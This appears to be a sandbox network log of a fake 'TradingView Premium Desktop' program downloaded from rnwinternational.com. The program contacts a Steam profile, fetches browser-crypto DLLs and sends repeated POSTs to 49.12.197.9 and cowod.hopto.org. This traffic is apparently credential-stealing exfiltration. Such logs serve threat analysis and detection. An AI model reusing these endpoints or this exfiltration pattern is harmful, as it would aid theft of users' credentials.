IN PTR

Response
DNS

234.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.179.250.142.in-addr.arpa

IN PTR

Response

234.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f101e100net
DNS

a.nel.cloudflare.com

chrome.exe

Remote address:

8.8.8.8:53

Request

a.nel.cloudflare.com

IN A

Response

a.nel.cloudflare.com

IN A

35.190.80.1
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D

chrome.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://rnwinternational.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
POST

https://a.nel.cloudflare.com/report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D

chrome.exe

Remote address:

35.190.80.1:443

Request

POST /report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D HTTP/2.0
host: a.nel.cloudflare.com
content-length: 429
content-type: application/reports+json
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

4.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.159.190.20.in-addr.arpa

IN PTR

Response
DNS

4.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.159.190.20.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR
DNS

1.80.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.80.190.35.in-addr.arpa

IN PTR

Response

1.80.190.35.in-addr.arpa

IN PTR

18019035bcgoogleusercontentcom
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

98.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.117.19.2.in-addr.arpa

IN PTR

Response

98.117.19.2.in-addr.arpa

IN PTR

a2-19-117-98deploystaticakamaitechnologiescom
DNS

steamcommunity.com

TradingView Premium Desktop.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

104.82.234.109
GET

https://steamcommunity.com/profiles/76561199780418869

TradingView Premium Desktop.exe

Remote address:

104.82.234.109:443

Request

GET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 02 Oct 2024 17:30:36 GMT
Content-Length: 34935
Connection: keep-alive
Set-Cookie: sessionid=6c6774f89760bc3bd3c906f3; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
GET

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

109.234.82.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

109.234.82.104.in-addr.arpa

IN PTR

Response

109.234.82.104.in-addr.arpa

IN PTR

a104-82-234-109deploystaticakamaitechnologiescom
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

9.197.12.49.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.197.12.49.in-addr.arpa

IN PTR

Response

9.197.12.49.in-addr.arpa

IN PTR

static91971249clientsyour-serverde
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 4925
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
GET

https://49.12.197.9/sqlp.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:40 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:40 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 573
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

https://49.12.197.9/freebl3.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:43 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:43 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
GET

https://49.12.197.9/mozglue.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:44 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:44 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
GET

https://49.12.197.9/msvcp140.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:44 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:44 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
GET

https://49.12.197.9/softokn3.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:45 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:45 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
GET

https://49.12.197.9/vcruntime140.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:45 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:45 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
GET

https://49.12.197.9/nss3.dll

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:46 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Wednesday, 02-Oct-2024 17:30:46 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 132017
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.209.201.84.in-addr.arpa

IN PTR

Response
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFIDBAFHCAKFBGCBFHIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://49.12.197.9/

TradingView Premium Desktop.exe

Remote address:

49.12.197.9:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 02 Oct 2024 17:30:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

cowod.hopto.org

TradingView Premium Desktop.exe

Remote address:

8.8.8.8:53

Request

cowod.hopto.org

IN A

Response

cowod.hopto.org

IN A

45.132.206.251
POST

http://cowod.hopto.org/

TradingView Premium Desktop.exe

Remote address:

45.132.206.251:80

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: cowod.hopto.org
Content-Length: 2373
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: openresty
Date: Wed, 02 Oct 2024 17:30:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Served-By: cowod.hopto.org
DNS

251.206.132.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

251.206.132.45.in-addr.arpa

IN PTR

Response
DNS

168.117.168.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.117.168.52.in-addr.arpa

IN PTR

Response

172.67.159.20:443

https://rnwinternational.com/favicon.ico

tls, http2

chrome.exe

4.7MB
145.2MB
86053
104186

HTTP Request

GET https://rnwinternational.com/get/

HTTP Response

200

HTTP Request

GET https://rnwinternational.com/cdn-cgi/speculation

HTTP Request

GET https://rnwinternational.com/tradingview_premium/TradingView_Premium_Desktop.zip

HTTP Request

GET https://rnwinternational.com/favicon.ico

HTTP Response

200

HTTP Response

200

HTTP Response

404
35.190.80.1:443

https://a.nel.cloudflare.com/report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D

tls, http2

chrome.exe

4.6kB
4.8kB
21
18

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D

HTTP Request

POST https://a.nel.cloudflare.com/report/v4?s=g0ag%2F0GX%2B7RKXpOb0dYax65zKOdXHg%2FKEqD8TffOI7WfvQdnmPCuvO%2FJJnTZNParhXYzSaY3qoFHTdG1A0TT19oMV3rAkrXVmqtXjKBvto1%2BRDqOo3%2B8jQzXUNLL8gys06URDNCL6w%3D%3D
104.82.234.109:443

https://steamcommunity.com/profiles/76561199780418869

tls, http

TradingView Premium Desktop.exe

2.2kB
42.5kB
38
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199780418869

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

958 B
2.7kB
11
8

HTTP Request

GET https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.4kB
622 B
9
6

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.5kB
2.2kB
10
7

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.6kB
6.4kB
13
10

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.4kB
672 B
9
6

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

6.2kB
645 B
13
8

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/sqlp.dll

tls, http

TradingView Premium Desktop.exe

91.4kB
2.5MB
1837
1832

HTTP Request

GET https://49.12.197.9/sqlp.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.5kB
565 B
9
6

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.7kB
565 B
9
6

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.5kB
565 B
9
6

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/freebl3.dll

tls, http

TradingView Premium Desktop.exe

24.4kB
707.6kB
518
515

HTTP Request

GET https://49.12.197.9/freebl3.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/mozglue.dll

tls, http

TradingView Premium Desktop.exe

21.7kB
627.8kB
459
456

HTTP Request

GET https://49.12.197.9/mozglue.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/msvcp140.dll

tls, http

TradingView Premium Desktop.exe

16.3kB
464.7kB
341
338

HTTP Request

GET https://49.12.197.9/msvcp140.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/softokn3.dll

tls, http

TradingView Premium Desktop.exe

9.8kB
266.6kB
199
196

HTTP Request

GET https://49.12.197.9/softokn3.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/vcruntime140.dll

tls, http

TradingView Premium Desktop.exe

3.7kB
84.0kB
68
65

HTTP Request

GET https://49.12.197.9/vcruntime140.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/nss3.dll

tls, http

TradingView Premium Desktop.exe

71.0kB
2.1MB
1531
1527

HTTP Request

GET https://49.12.197.9/nss3.dll

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.5kB
2.8kB
10
7

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.4kB
748 B
9
6

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

201.6kB
2.6kB
153
50

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.4kB
518 B
8
5

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
49.12.197.9:443

https://49.12.197.9/

tls, http

TradingView Premium Desktop.exe

1.4kB
518 B
8
5

HTTP Request

POST https://49.12.197.9/

HTTP Response

200
45.132.206.251:80

http://cowod.hopto.org/

http

TradingView Premium Desktop.exe

3.0kB
360 B
7
4

HTTP Request

POST http://cowod.hopto.org/

HTTP Response

200

8.8.8.8:53

rnwinternational.com

dns

chrome.exe

66 B
98 B
1
1

DNS Request

rnwinternational.com

DNS Response

172.67.159.20

104.21.42.74
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

101.209.201.84.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

101.209.201.84.in-addr.arpa
8.8.8.8:53

20.159.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

20.159.67.172.in-addr.arpa
8.8.8.8:53

234.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

234.179.250.142.in-addr.arpa
224.0.0.251:5353

chrome.exe

204 B
3
8.8.8.8:53

a.nel.cloudflare.com

dns

chrome.exe

66 B
82 B
1
1

DNS Request

a.nel.cloudflare.com

DNS Response

35.190.80.1
8.8.8.8:53

4.159.190.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

4.159.190.20.in-addr.arpa

DNS Request

4.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

146 B
144 B
2
1

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

1.80.190.35.in-addr.arpa

dns

70 B
120 B
1
1

DNS Request

1.80.190.35.in-addr.arpa
35.190.80.1:443

a.nel.cloudflare.com

https

chrome.exe

1.6kB
3.8kB
4
6
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

241.42.69.40.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

241.42.69.40.in-addr.arpa
8.8.8.8:53

98.117.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

98.117.19.2.in-addr.arpa
8.8.8.8:53

steamcommunity.com

dns

TradingView Premium Desktop.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

104.82.234.109
8.8.8.8:53

109.234.82.104.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

109.234.82.104.in-addr.arpa
8.8.8.8:53

9.197.12.49.in-addr.arpa

dns

70 B
125 B
1
1

DNS Request

9.197.12.49.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

99.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

99.209.201.84.in-addr.arpa
8.8.8.8:53

cowod.hopto.org

dns

TradingView Premium Desktop.exe

61 B
77 B
1
1

DNS Request

cowod.hopto.org

DNS Response

45.132.206.251
8.8.8.8:53

251.206.132.45.in-addr.arpa

dns

73 B
134 B
1
1

